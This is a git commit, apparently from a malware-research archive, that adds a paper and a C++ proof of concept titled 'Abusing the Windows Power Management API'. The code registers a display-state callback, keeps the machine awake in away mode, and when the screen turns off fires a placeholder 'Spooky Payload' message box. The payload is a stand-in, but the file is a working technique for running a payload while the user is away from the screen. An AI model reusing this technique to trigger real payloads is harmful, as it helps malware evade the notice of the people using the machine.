commit 5b75d2e6d792c8efb896a71a49bc08140a7cabb3
Author: vxunderground <57078196+vxunderground@users.noreply.github.com>
Date:   Sun Oct 11 00:32:21 2020 -0500

    Add files via upload

diff --git a/Abusing the Windows Power Management API/AbusingtheWindowsPowerManagementAPI.pdf b/Abusing the Windows Power Management API/AbusingtheWindowsPowerManagementAPI.pdf
new file mode 100644
index 0000000..37b93bc
Binary files /dev/null and b/Abusing the Windows Power Management API/AbusingtheWindowsPowerManagementAPI.pdf differ
diff --git a/Abusing the Windows Power Management API/src.cpp b/Abusing the Windows Power Management API/src.cpp
new file mode 100644
index 0000000..9abed81
--- /dev/null
+++ b/Abusing the Windows Power Management API/src.cpp	
@@ -0,0 +1,91 @@
+#include <Windows.h>
+#include <powersetting.h>
+#include <powrprof.h>
+
+#define WIN32_LEAN_AND_MEAN
+
+typedef DWORD(WINAPI* POWERSETTINGREGISTERNOTIFICATION)(LPCGUID, DWORD, HANDLE, PHPOWERNOTIFY);
+typedef DWORD(WINAPI* POWERSETTINGUNREGISTERNOTIFICATION)(HPOWERNOTIFY);
+
+ULONG CALLBACK HandlePowerNotifications(PVOID Context, ULONG Type, PVOID Setting);
+
+int main(VOID)
+{
+	DWORD dwError = ERROR_SUCCESS;
+	HMODULE hLibrary;
+	POWERSETTINGREGISTERNOTIFICATION _PowerSettingRegisterNotification = NULL;
+	POWERSETTINGUNREGISTERNOTIFICATION _PowerSettingUnregisterNotification = NULL;
+	DEVICE_NOTIFY_SUBSCRIBE_PARAMETERS NotificationsParameters;
+	HANDLE hNotificationRegister = NULL;
+
+	hLibrary = LoadLibrary(L"powrprof.dll");
+	if (hLibrary == NULL)
+		goto FAILURE;
+
+	_PowerSettingRegisterNotification = (POWERSETTINGREGISTERNOTIFICATION)GetProcAddress(hLibrary, "PowerSettingRegisterNotification");
+	_PowerSettingUnregisterNotification = (POWERSETTINGUNREGISTERNOTIFICATION)GetProcAddress(hLibrary, "PowerSettingUnregisterNotification");
+	
+	if (!_PowerSettingRegisterNotification || !_PowerSettingUnregisterNotification)
+		goto FAILURE;
+
+	NotificationsParameters.Callback = HandlePowerNotifications;
+	NotificationsParameters.Context = NULL;
+
+	if (_PowerSettingRegisterNotification(&GUID_CONSOLE_DISPLAY_STATE, DEVICE_NOTIFY_CALLBACK,
+		(HANDLE)&NotificationsParameters, &hNotificationRegister) != ERROR_SUCCESS)
+	{
+		goto FAILURE;
+	}
+
+	if (SetThreadExecutionState(ES_AWAYMODE_REQUIRED | ES_CONTINUOUS | ES_SYSTEM_REQUIRED) == NULL)
+		goto FAILURE;
+
+	while (1){ Sleep(100); }
+
+	if (hNotificationRegister)
+		_PowerSettingUnregisterNotification(hNotificationRegister);
+
+	return ERROR_SUCCESS;
+
+FAILURE:
+
+	dwError = GetLastError();
+
+	if (hNotificationRegister)
+		_PowerSettingUnregisterNotification(hNotificationRegister);
+
+	return dwError;
+
+}
+
+ULONG CALLBACK HandlePowerNotifications(PVOID Context, ULONG Type, PVOID Setting)
+{
+	PPOWERBROADCAST_SETTING PowerSettings = (PPOWERBROADCAST_SETTING)Setting;
+
+	if (Type == PBT_POWERSETTINGCHANGE && PowerSettings->PowerSetting == GUID_CONSOLE_DISPLAY_STATE)
+	{
+		switch (*PowerSettings->Data)
+		{
+			case 0x0:
+			case 0x2:
+			{
+				Sleep(10000);
+				MessageBoxW(NULL, L"Spooky Payload", L"", MB_OK);
+				break;
+			}
+
+			case 0x1:
+			{
+				Sleep(1);
+				break;
+			}
+
+			default:
+			{
+				break;
+			}
+		}
+	}
+
+	return ERROR_SUCCESS;
+}
\ No newline at end of file